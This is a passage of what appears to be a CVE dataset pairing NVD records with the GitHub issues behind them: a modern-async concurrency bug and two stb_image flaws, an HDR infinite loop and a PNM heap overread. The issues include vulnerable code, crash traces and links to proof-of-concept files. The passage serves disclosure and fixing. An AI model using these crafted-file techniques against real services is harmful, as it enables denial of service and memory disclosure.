"Third Party Advisory"
],
"url": "https://github.com/nicolas-van/modern-async/security/advisories/GHSA-3pcq-34w5-p4g2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nicolas-van/modern-async/commit/0010d28de1b15d51db3976080e26357fa7144436"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nicolas-van/modern-async/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nicolas-van/modern-async/security/advisories/GHSA-3pcq-34w5-p4g2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:modern-async_project:modern-async:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "8342CAB0-7958-4083-BFBE-643DDB7E9E2A",
"versionEndExcluding": "1.0.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/nicolas-van/modern-async/issues/5 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nicolas-van",
"modern-async"
] | See this Code:
```js
//@ts-ignore
var {forEachLimit}=require('modern-async')
var ar=[]
for(let i=0;i<=100;i++) ar.push(i)
forEachLimit(ar,async item=>{
await delay(1000)
console.log(item)
},5)
function delay(ms){return new Promise(resolve=>setTimeout(resolve,ms))}
```
It should show every 1 seconds 5 items. But it shows after 1 second all the items.
I found the bug and I wanted to fix it:
In the file forEachLimit.js:
```js
async function forEachLimit (iterable, iteratee, concurrency) {
await mapLimit(iterable, async (v, i, t) => {
iteratee(v, i, t)
}, concurrency)
}
```
missing await before ```iteratee(v, i ,t)```
I wanted to fix it but the current version in GitHub is different (in development).
Can you provide hotfix and publish it to NPM as 1.0.4?
It's really a security issue for servers to handle too many requests at the same time.
By the way, thank you for you awesome library. | forEachLimit is ignoring the concurrent paramter | https://api.github.com/repos/nicolas-van/modern-async/issues/5/comments | 1 | 2021-10-20T05:17:12Z | 2021-10-26T07:49:53Z | https://github.com/nicolas-van/modern-async/issues/5 | 1,030,984,396 | 5 | 2,709 |
CVE-2021-42715 | 2021-10-21T19:15:08.017 | An issue was discovered in stb stb_image.h 1.33 through 2.27. The HDR loader parsed truncated end-of-file RLE scanlines as an infinite sequence of zero-length runs. An attacker could potentially have caused denial of service in applications using stb_image by submitting crafted HDR files. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1224"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/pull/1223"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00045.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1224"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/pull/1223"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00045.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nothings:stb_image.h:*:*:*:*:*:*:*:*",
"matchCriteriaId": "999F1FA2-C650-44D5-84C5-444967092386",
"versionEndExcluding": null,
"versionEndIncluding": "2.27",
"versionStartExcluding": null,
"versionStartIncluding": "1.33",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"835"
] | 835 | https://github.com/nothings/stb/issues/1224 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nothings",
"stb"
] | **Summary**
stb_image's HDR loader in versions 1.33 to and including v2.27 parsed truncated end-of-file RLE scanlines as an infinite sequence of zero-length runs. An attacker could potentially have caused denial of service in applications using stb_image by submitting specially constructed HDR files.
CVE number: [CVE-2021-42715](https://nvd.nist.gov/vuln/detail/CVE-2021-42715)
**Describe the bug**
In stb_image's HDR reader, loading a specially constructed invalid HDR file can
result in an infinite loop within the RLE decoder.
This issue includes a fix in pull request #1223, and a proof of concept file that
can be used to reproduce the crash. We're reporting this on GitHub Issues
following the guidance in issue #1213.
The issue occurs in [this loop](https://github.com/nothings/stb/blob/master/stb_image.h#L7184) within `stbi__hdr_load()`:
```
while ((nleft = width - i) > 0) {
count = stbi__get8(s);
if (count > 128) {
// Run
value = stbi__get8(s);
count -= 128;
if (count > nleft) { STBI_FREE(hdr_data); STBI_FREE(scanline); return stbi__errpf("corrupt", "bad RLE data in HDR"); }
for (z = 0; z < count; ++z)
scanline[i++ * 4 + k] = value;
} else {
// Dump
if (count > nleft) { STBI_FREE(hdr_data); STBI_FREE(scanline); return stbi__errpf("corrupt", "bad RLE data in HDR"); }
for (z = 0; z < count; ++z)
scanline[i++ * 4 + k] = stbi__get8(s);
}
}
```
The proof of concept file manages to get this part of the decoder into a state
where:
* `nleft` is equal to 11;
* `s` is at the end of the file.
Because `s` is at the end of the file, `stbi__get8()` always returns 0, since
`s->img_buffer == s->img_buffer_end` here:
```
stbi_inline static stbi_uc stbi__get8(stbi__context *s)
{
if (s->img_buffer < s->img_buffer_end)
return *s->img_buffer++;
if (s->read_from_callbacks) {
stbi__refill_buffer(s);
return *s->img_buffer++;
}
return 0;
}
```
This means that `count` is always set to 0; this passes the error check, but
doesn't affect any program state, meaning that the loop runs forever, an
availability issue.
**To Reproduce**
This .zip contains a 222 KB .hdr file, rle_iloop_poc.hdr, which reproduces this issue:
[rle_iloop_poc.zip](https://github.com/nothings/stb/files/7306659/rle_iloop_poc.zip)
Calling `stbi_load()` with a path to this file never returns. I was able to
verify this using tests/image_test.c (modified slightly in order to build) on
Windows version 20H2 with Microsoft Visual Studio 2019, and I expect it should
reproduce on other systems as well.
This file was found using the [Radamsa fuzzer](https://gitlab.com/akihe/radamsa).
I think this particular file works by setting the RLE flags on the last scanline
in the file and being truncated in just the right place, but I'm not 100% sure.
**Expected behavior**
stbi_load should eventually return.
Based on Bruce Walter's
[https://www.graphics.cornell.edu/~bjw/rgbe/rgbe.c HDR reader](https://www.graphics.cornell.edu/~bjw/rgbe/rgbe.c),
it seems like the intended behavior is that a run length of 0 should be treated
as invalid, which is the approach the pull request takes. However, other
solutions are possible (e.g. detecting when the end of the file has been reached) - I don't have any preference either way.
Thanks! | In stb_image's HDR reader, loading a specially constructed invalid HDR file can result in an infinite loop within the RLE decoder | https://api.github.com/repos/nothings/stb/issues/1224/comments | 4 | 2021-10-07T20:06:19Z | 2023-01-29T23:48:43Z | https://github.com/nothings/stb/issues/1224 | 1,020,414,414 | 1,224 | 2,710 |
CVE-2021-42716 | 2021-10-21T19:15:08.083 | An issue was discovered in stb stb_image.h 2.27. The PNM loader incorrectly interpreted 16-bit PGM files as 8-bit when converting to RGBA, leading to a buffer overflow when later reinterpreting the result as a 16-bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to 1024 bytes of non-consecutive heap data without control over the read location. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1166"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1225"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/pull/1223"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1166"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1225"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/pull/1223"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nothings:stb_image.h:2.27:*:*:*:*:*:*:*",
"matchCriteriaId": "026BA031-EE47-451B-8A8C-1CE5F0233D27",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/nothings/stb/issues/1166 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nothings",
"stb"
] | i find a heap-buffer-overflow(oob read)
[poc.zip](https://github.com/nothings/stb/files/6815470/poc.zip)
in stbi__pnm_load, if req_comp && req_comp != s->img_n, the will call stbi__convert_format, But it does not multiply ri->bits_per_channel / 8, 0 ,if ri.bits_per_channel != 8, will call stbi__convert_16_to_8, and make oob read
`./test poc`
`=================================================================
==15240==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100000249c at pc 0x5647f49c70ae bp 0x7ffdee668420 sp 0x7ffdee668410
READ of size 2 at 0x62100000249c thread T0
#0 0x5647f49c70ad in stbi__convert_16_to_8(unsigned short*, int, int, int) (/home/test/stb/poc/test+0x170ad)
#1 0x5647f49c7819 in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int) (/home/test/stb/poc/test+0x17819)
#2 0x5647f49c8107 in stbi_load_from_file (/home/test/stb/poc/test+0x18107)
#3 0x5647f49c7ffc in stbi_load (/home/test/stb/poc/test+0x17ffc)
#4 0x5647f4a014df in main (/home/test/stb/poc/test+0x514df)
#5 0x7f521b45abf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#6 0x5647f49b6269 in _start (/home/test/stb/poc/test+0x6269)
0x62100000249c is located 0 bytes to the right of 3996-byte region [0x621000001500,0x62100000249c)
allocated by thread T0 here:
#0 0x7f521c02fb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
#1 0x5647f49c68d2 in stbi__malloc(unsigned long) (/home/test/stb/poc/test+0x168d2)
#2 0x5647f49c6b1f in stbi__malloc_mad3(int, int, int, int) (/home/test/stb/poc/test+0x16b1f)
#3 0x5647f49ca7f0 in stbi__convert_format(unsigned char*, int, int, unsigned int, unsigned int) (/home/test/stb/poc/test+0x1a7f0)
#4 0x5647f4a00005 in stbi__pnm_load(stbi__context*, int*, int*, int*, int, stbi__result_info*) (/home/test/stb/poc/test+0x50005)
#5 0x5647f49c6e91 in stbi__load_main(stbi__context*, int*, int*, int*, int, stbi__result_info*, int) (/home/test/stb/poc/test+0x16e91)
#6 0x5647f49c7663 in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int) (/home/test/stb/poc/test+0x17663)
#7 0x5647f49c8107 in stbi_load_from_file (/home/test/stb/poc/test+0x18107)
#8 0x5647f49c7ffc in stbi_load (/home/test/stb/poc/test+0x17ffc)
#9 0x5647f4a014df in main (/home/test/stb/poc/test+0x514df)
#10 0x7f521b45abf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/test/stb/poc/test+0x170ad) in stbi__convert_16_to_8(unsigned short*, int, int, int)
Shadow bytes around the buggy address:
0x0c427fff8440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fff8450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fff8460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fff8470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fff8480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fff8490: 00 00 00[04]fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fff84a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==15240==ABORTING
` | stbi__pnm_load heap-buffer-overflow bug | https://api.github.com/repos/nothings/stb/issues/1166/comments | 3 | 2021-07-14T10:52:47Z | 2023-01-29T23:48:49Z | https://github.com/nothings/stb/issues/1166 | 944,299,089 | 1,166 | 2,711 |
CVE-2021-42716 | 2021-10-21T19:15:08.083 | An issue was discovered in stb stb_image.h 2.27. The PNM loader incorrectly interpreted 16-bit PGM files as 8-bit when converting to RGBA, leading to a buffer overflow when later reinterpreting the result as a 16-bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to 1024 bytes of non-consecutive heap data without control over the read location. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1166"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1225"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/pull/1223"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/"
},
{
"source": "cve@mitre.org",
"tags": null,
